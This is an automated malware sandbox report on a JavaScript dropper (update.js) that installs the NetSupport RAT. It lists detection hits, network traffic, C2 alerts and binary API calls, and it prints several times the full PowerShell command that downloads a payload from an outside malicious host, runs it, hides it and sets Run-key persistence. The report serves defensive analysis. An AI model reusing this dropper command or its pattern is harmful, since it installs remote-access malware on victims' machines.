ParentProcessId: 3528, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-
                                Sigma detected: Script Initiated Connection
                                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 79.141.163.131, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3528, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49704
                                Sigma detected: Suspicious PowerShell Download - PoshModule
                                Source: Event LogsAuthor: Florian Roth (Nextron Systems): Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 3e565921-cebc-473e-80e2-5ed578f3559d Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD; Engine Version = 5.1.19041.1682 Runspace ID = 577abfa9-00aa-4c41-b260-64ff1bfc179e Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = user-PC\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.IO.Compression.FileSystem", Source: Microsoft-Windows-PowerShell, UserData: , data0: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 3e565921-cebc-473e-80e2-5ed578f3559d Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.e
                                Sigma detected: Usage Of Web Request Commands And Cmdlets
                                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3528, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-
                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ProcessId: 3528, ProcessName: wscript.exe
                                Sigma detected: Non Interactive PowerShell Process Spawned
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3528, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-

                                Remote Access Functionality

                                barindex
                                Sigma detected: Powershell drops NetSupport RAT client
                                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6632, TargetFilename: C:\Users\user\AppData\Roaming\HHIAHYOW-5\NSM.LIC

                                Suricata Signatures

                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-25T19:01:57.660273+020028277451Malware Command and Control Activity Detected192.168.2.16497065.181.159.137443TCP

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus detection for URL or domain
                                Source: https://roadrunnersell.com/trade/d.php?5517Avira URL Cloud: Label: malware
                                Source: https://roadrunnersell.com/Avira URL Cloud: Label: malware
                                Source: https://roadrunnersell.com/9Avira URL Cloud: Label: malware
                                Source: https://roadrunnersell.com/trade/fix.php?532dAvira URL Cloud: Label: malware
                                Source: https://roadrunnersell.com/trade/fix.php?532Avira URL Cloud: Label: malware
                                Multi AV Scanner detection for dropped file
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\HTCTL32.DLLReversingLabs: Detection: 13%
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeReversingLabs: Detection: 27%
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\remcmdstub.exeReversingLabs: Detection: 23%
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,13_2_110ADA40
                                Source: unknownHTTPS traffic detected: 79.141.163.131:443 -> 192.168.2.16:49705 version: SSL 3.0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\HHIAHYOW-5\msvcr100.dllJump to behavior
                                Source: unknownHTTPS traffic detected: 79.141.163.131:443 -> 192.168.2.16:49704 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 79.141.163.131:443 -> 192.168.2.16:49705 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 79.141.163.131:443 -> 192.168.2.16:49709 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 79.141.163.131:443 -> 192.168.2.16:49710 version: TLS 1.2
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,13_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,13_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,13_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,13_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,13_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,13_2_1106ABD0

                                Software Vulnerabilities

                                barindex
                                Suspicious execution chain found
                                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                Networking

                                barindex
                                Suricata IDS alerts for network traffic
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.16:49706 -> 5.181.159.137:443
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 79.141.163.131 443Jump to behavior
                                Source: global trafficHTTP traffic detected: GET /trade/d.php?5517 HTTP/1.1Host: roadrunnersell.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 104.26.1.231 104.26.1.231
                                Source: Joe Sandbox ViewASN Name: MIVOCLOUDMD MIVOCLOUDMD
                                Source: Joe Sandbox ViewASN Name: HZ-US-ASBG HZ-US-ASBG
                                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: global trafficHTTP traffic detected: POST /trade/fix.php?532 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: roadrunnersell.comContent-Length: 7Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /trade/fix.php?532 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: roadrunnersell.comContent-Length: 7Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /trade/fix.php?532 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: roadrunnersell.comContent-Length: 7Connection: Keep-AliveCache-Control: no-cache
                                Source: unknownHTTPS traffic detected: 79.141.163.131:443 -> 192.168.2.16:49705 version: SSL 3.0
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.137
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.137
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.137
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /trade/d.php?5517 HTTP/1.1Host: roadrunnersell.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: roadrunnersell.com
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST /trade/fix.php?532 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: roadrunnersell.comContent-Length: 7Connection: Keep-AliveCache-Control: no-cache
                                Source: client32.exeString found in binary or memory: http://%s/fakeurl.htm
                                Source: client32.exeString found in binary or memory: http://%s/testpage.htm
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://0.30000000000000004.com/
                                Source: client32.exeString found in binary or memory: http://127.0.0.1
                                Source: client32.exeString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stat.ethz.ch/R-manual/R-devel/library/grDevices/html/boxplot.stats.html
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.1301369817.000002B2D2997000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/Variable1CompositeOperatio
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flight
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/apache/echarts/issues/14266
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/apache/incubator-echarts/issues/11369
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/apache/incubator-echarts/issues/12229
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.js
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.js
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.js
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ecomfe/zrender/blob/master/LICENSE.txt
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1450836451.000002BB045AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1357625145.000002BB091D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1192606451.000002BB00351000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.1323964009.000002B2CFBED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdf
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jsbench.me/2vkpcekkvw/1)
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB02158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB02EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jsperf.com/try-catch-performance-overhead
                                Source: wscript.exe, 00000000.00000003.1353432566.000002BB08DF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
